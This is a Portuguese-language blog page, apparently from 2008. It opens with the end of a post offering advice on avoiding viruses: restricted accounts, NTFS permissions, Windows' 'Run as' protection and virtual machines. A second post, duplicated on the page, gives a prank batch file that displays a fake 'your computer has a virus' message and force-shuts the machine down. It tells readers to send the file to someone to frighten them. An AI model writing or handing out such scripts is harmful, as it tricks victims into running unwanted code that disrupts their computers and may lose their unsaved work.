Por essas e outras, muito, muito cuidado ao abrir programas da Internet. Não clique naqueles banners de propaganda suspeitos, com carinhas lindas. Não clique no anúncio "Almente o tamanho do seu pênis". Não veja as montagens de fotos que não sei quem fez de você com não sei quem lá, e que te deixou um recado no orkut. Cuidado com os joguinhos em flash "executáveis"; se eles forem de origem desconhecida, tome mais cuidado ainda, prefira ver as versões em páginas HTML com o ".swf" separado. Mesmo se foi um amigo confiável que te passou, ele pode ter pego num site malicioso sem saber, ou então recebeu do primo do colega do vizinho da tia de outra cidade. Se você navega na Internet e mantém arquivos importantes no seu computador, considere o uso de uma conta de usuário restrita para navegar, ou use a conta de "Convidado", é o melhor a ser feito. Mantenha suas partições no Windows formatadas em NTFS, pois ao usar uma conta restrita, ela não terá acesso completo aos arquivos do sistema nem das outras pastas. Se o apagador que mostrei como criar, por exemplo, fosse rodado com uma conta de usuário restrita numa partição em NTFS, ele não conseguiria apagar praticamente NADA da pasta do Windows nem das outras pastas. O maior estrago seria na conta de usuário usada para rodá-lo, por isso se fosse um usuário restrito ou o convidado, seus arquivos estariam a salvo. Note que mesmo em NTFS, se você usasse a conta de administrador, boa parte dessa proteção iria por água abaixo, já que normalmente os administradores podem apagar arquivos do sistema e das outras pastas. E um programa executado como administrador, tem todos os direitos concedidos à conta de administrador. Ao instalar um programa, desmarque na instalação tudo o que for suspeito, especialmente se não estiver documentado. Muitas barras de ferramentas extras que aparecem no seu navegador foram instaladas junto com algum programa que você instalou "conscientemente", clicando em tudo, sem ler nada. LEIA. LEIA TUDO O QUE PUDER. Muitos spywares são documentados na licença de uso de um software, e muitos brasileiros que já não têm costume de ler mesmo, assim instalam ele sem saber. Um software que se preze e que respeite seus usuários deixa bem claro suas condições de uso, você só usa se concordar. E nada mais justo, se não concordar, simplesmente NÃO UTILIZE.
Uma dica para usuários do Windows XP ou as versões superiores. Ao rodar um programa suspeito, ou animações em flash executáveis, joguinhos que se dizem que "não precisa instalar", etc, o Windows pode desativar algumas alterações que o programa tente realizar. Por exemplo, ele não conseguirá alterar NADA no registro, o que é uma grande vantagem. Claro, se o programa depender disso para funcionar, nada feito, ele não irá rodar ou mostrará uma série de mensagens de erro. Executar programas confiáveis assim pode fazer com que eles não funcionem também, pois é comum um programa ler e gravar dados no registro ao ser aberto ou fechado. Já um joguinho "não instalável" ou uma animação em flash não deveria fazer nada isso, né? Para executar um programa no modo restrito: clique com o botão direito do mouse no ícone do mesmo, escolha "Executar como". Deixe selecionado o seu nome de usuário, e deixe marcado o item "Proteger meu computador e meus dados contra atividades não autorizadas de programas". Dê OK. Abrindo o programa assim, entre outras coisas, ele não poderá alterar nada no registro do Windows. Se o item "Executar como" não aparecer no menu, selecione o arquivo, segure SHIFT e clique com o direito nele.
Para programas suspeitos ou totalmente desconhecidos, eu recomendo testar em máquinas virtuais, como comentei mais acima. É melhor. Se der pau, dá só nela (a menos que você tenha arquivos no seu PC na rede compartilhados com permissão de escrita). Apague o arquivo do HD virtual e recopie a pasta. É mais prático do que usar uma máquina cobaia, tendo que reinstalar ou reparar tudo.
Enfim, esta dica tem diversos públicos. Não estou incentivando o mal, mas tirando uma curiosidade de muita gente sobre os vírus. O uso que se fará dela é de responsabilidade de cada um, né?! Um martelo pode ser usado na construção da sua casa, dos seus móveis. Mas pode também servir também para estourar seus miolos. Tudo é relativo.
sexta-feira, 25 de abril de 2008
comando para assustar um usuário
você pode assustar alguém com um comando que desliga o pc e mostra uma mensagem,por exemplo,seu computador está sendo deletado e vai desligar agora,
e só copiar esse comando no bloco de notas ou no wordPad:
@ echo"seu computador ta com virus"
pause
shutdown -f -t0 -s
na parte entre aspas,você pode por qualquer coisa.
salve como "nome.bat" e envie para a pessoa
quando ela abrir o arquivo, aparece o que você escreveu nas aspas e o computador dela vai desligar
OBS:eu não me responsabilizo por que vocês vão fazer com esse comando
não me culpe depois (e daí, ele nâo faz nada mesmo,agora as outras postagens...)
e só copiar esse comando no bloco de notas ou no wordPad:
@ echo"seu computador ta com virus"
pause
shutdown -f -t0 -s
na parte entre aspas,você pode por qualquer coisa.
salve como "nome.bat" e envie para a pessoa
quando ela abrir o arquivo, aparece o que você escreveu nas aspas e o computador dela vai desligar
OBS:eu não me responsabilizo por que vocês vão fazer com esse comando
não me culpe depois (e daí, ele nâo faz nada mesmo,agora as outras postagens...)
Assinar:
Postagens (Atom)